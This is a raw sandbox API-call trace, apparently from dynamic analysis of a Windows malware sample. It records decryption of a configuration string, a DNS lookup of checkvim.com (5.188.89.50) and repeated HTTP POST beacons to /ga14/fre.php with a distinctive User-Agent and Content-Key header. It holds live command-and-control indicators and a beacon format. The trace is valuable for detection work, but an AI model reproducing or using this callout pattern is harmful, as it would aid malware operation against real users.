arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0212.079] GetProcessHeap () returned 0x840000 [0212.079] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0212.079] GetProcessHeap () returned 0x840000 [0212.079] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0212.079] GetProcessHeap () returned 0x840000 [0212.079] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa70 [0212.079] GetProcessHeap () returned 0x840000 [0212.079] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0212.079] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0212.080] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0212.080] GetProcessHeap () returned 0x840000 [0212.080] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0212.080] GetProcessHeap () returned 0x840000 [0212.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0212.080] send (s=0x29c, buf=0x873a58*, len=237, flags=0) returned 237 [0212.081] send (s=0x29c, buf=0x87eb58*, len=159, flags=0) returned 159 [0212.081] GetProcessHeap () returned 0x840000 [0212.081] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0212.081] recv (in: s=0x29c, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0212.474] GetProcessHeap () returned 0x840000 [0212.474] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0212.474] GetProcessHeap () returned 0x840000 [0212.474] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0212.474] GetProcessHeap () returned 0x840000 [0212.474] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0212.474] GetProcessHeap () returned 0x840000 [0212.474] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0212.474] closesocket (s=0x29c) returned 0 [0212.475] GetProcessHeap () returned 0x840000 [0212.475] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0212.475] GetProcessHeap () returned 0x840000 [0212.475] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0212.475] GetProcessHeap () returned 0x840000 [0212.475] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0212.475] GetProcessHeap () returned 0x840000 [0212.475] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0212.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1160) returned 0x29c [0212.478] Sleep (dwMilliseconds=0xea60) [0212.479] GetProcessHeap () returned 0x840000 [0212.479] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0212.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.481] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0212.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.489] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f578) returned 1 [0212.496] GetProcessHeap () returned 0x840000 [0212.496] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0212.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.497] CryptImportKey (in: hProv=0x86f578, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0212.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.498] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0212.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.500] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.500] GetProcessHeap () returned 0x840000 [0212.500] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0212.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.501] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0212.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.502] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0212.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.503] CryptReleaseContext (hProv=0x86f578, dwFlags=0x0) returned 1 [0212.503] GetProcessHeap () returned 0x840000 [0212.503] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0212.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0212.504] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0212.505] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0212.507] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0212.519] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.519] GetProcessHeap () returned 0x840000 [0212.519] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0212.519] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0212.520] GetProcessHeap () returned 0x840000 [0212.520] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0212.520] GetProcessHeap () returned 0x840000 [0212.520] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0212.520] GetProcessHeap () returned 0x840000 [0212.520] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0212.520] GetProcessHeap () returned 0x840000 [0212.520] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0212.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.522] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0212.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.528] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0212.564] GetProcessHeap () returned 0x840000 [0212.564] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0212.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.565] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0212.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.567] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0212.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.567] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.567] GetProcessHeap () returned 0x840000 [0212.568] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0212.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.569] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0212.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.570] CryptDestroyKey (hKey=0x87e570) returned 1 [0212.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0212.571] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0212.571] GetProcessHeap () returned 0x840000 [0212.571] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0212.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0212.573] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0212.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0212.574] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0212.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0212.575] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0212.575] GetProcessHeap () returned 0x840000 [0212.575] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0212.575] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0212.578] GetProcessHeap () returned 0x840000 [0212.578] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0212.578] socket (af=2, type=1, protocol=6) returned 0x2a0 [0212.578] connect (s=0x2a0, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0212.655] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0212.655] GetProcessHeap () returned 0x840000 [0212.655] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fe80 [0212.655] GetProcessHeap () returned 0x840000 [0212.655] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0212.656] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0212.657] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0212.657] GetProcessHeap () returned 0x840000 [0212.657] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0212.657] GetProcessHeap () returned 0x840000 [0212.657] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0212.657] GetProcessHeap () returned 0x840000 [0212.657] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0212.657] GetProcessHeap () returned 0x840000 [0212.657] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0212.658] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0212.659] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0212.659] GetProcessHeap () returned 0x840000 [0212.659] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0212.659] GetProcessHeap () returned 0x840000 [0212.659] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0212.659] send (s=0x2a0, buf=0x873a58*, len=237, flags=0) returned 237 [0212.659] send (s=0x2a0, buf=0x87eb58*, len=159, flags=0) returned 159 [0212.660] GetProcessHeap () returned 0x840000 [0212.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0212.660] recv (in: s=0x2a0, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0213.335] GetProcessHeap () returned 0x840000 [0213.335] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0213.335] GetProcessHeap () returned 0x840000 [0213.335] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0213.335] GetProcessHeap () returned 0x840000 [0213.335] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0213.335] GetProcessHeap () returned 0x840000 [0213.335] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fe80 | out: hHeap=0x840000) returned 1 [0213.336] closesocket (s=0x2a0) returned 0 [0213.336] GetProcessHeap () returned 0x840000 [0213.336] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0213.336] GetProcessHeap () returned 0x840000 [0213.336] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0213.336] GetProcessHeap () returned 0x840000 [0213.336] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0213.336] GetProcessHeap () returned 0x840000 [0213.336] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0213.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x37c) returned 0x2a0 [0213.338] Sleep (dwMilliseconds=0xea60) [0213.339] GetProcessHeap () returned 0x840000 [0213.339] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0213.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.340] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0213.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.345] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0213.365] GetProcessHeap () returned 0x840000 [0213.365] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0213.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.366] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0213.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.367] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0213.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.368] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.368] GetProcessHeap () returned 0x840000 [0213.368] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0213.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.372] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0213.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.373] CryptDestroyKey (hKey=0x87e630) returned 1 [0213.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.374] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0213.374] GetProcessHeap () returned 0x840000 [0213.374] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0213.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0213.375] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0213.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0213.376] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0213.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0213.378] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0213.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0213.379] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0213.379] GetProcessHeap () returned 0x840000 [0213.379] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0213.379] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0213.379] GetProcessHeap () returned 0x840000 [0213.379] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0213.379] GetProcessHeap () returned 0x840000 [0213.379] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0213.379] GetProcessHeap () returned 0x840000 [0213.379] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0213.379] GetProcessHeap () returned 0x840000 [0213.379] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0213.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.381] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0213.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.386] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0213.392] GetProcessHeap () returned 0x840000 [0213.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0213.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.393] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0213.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.394] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0213.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.395] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0213.395] GetProcessHeap () returned 0x840000 [0213.395] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0213.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.398] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0213.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.399] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0213.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0213.400] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0213.400] GetProcessHeap () returned 0x840000 [0213.400] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0213.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0213.401] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0213.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0213.402] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0213.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0213.403] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0213.403] GetProcessHeap () returned 0x840000 [0213.403] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0213.403] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0213.404] GetProcessHeap () returned 0x840000 [0213.404] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0213.404] socket (af=2, type=1, protocol=6) returned 0x2a4 [0213.405] connect (s=0x2a4, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0213.473] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0213.473] GetProcessHeap () returned 0x840000 [0213.473] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0213.473] GetProcessHeap () returned 0x840000 [0213.473] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0213.473] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0213.474] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0213.474] GetProcessHeap () returned 0x840000 [0213.474] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0213.474] GetProcessHeap () returned 0x840000 [0213.474] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0213.474] GetProcessHeap () returned 0x840000 [0213.474] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb00 [0213.475] GetProcessHeap () returned 0x840000 [0213.475] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0213.475] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0213.476] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0213.476] GetProcessHeap () returned 0x840000 [0213.476] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0213.476] GetProcessHeap () returned 0x840000 [0213.476] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0213.476] send (s=0x2a4, buf=0x873a58*, len=237, flags=0) returned 237 [0213.476] send (s=0x2a4, buf=0x87eb58*, len=159, flags=0) returned 159 [0213.476] 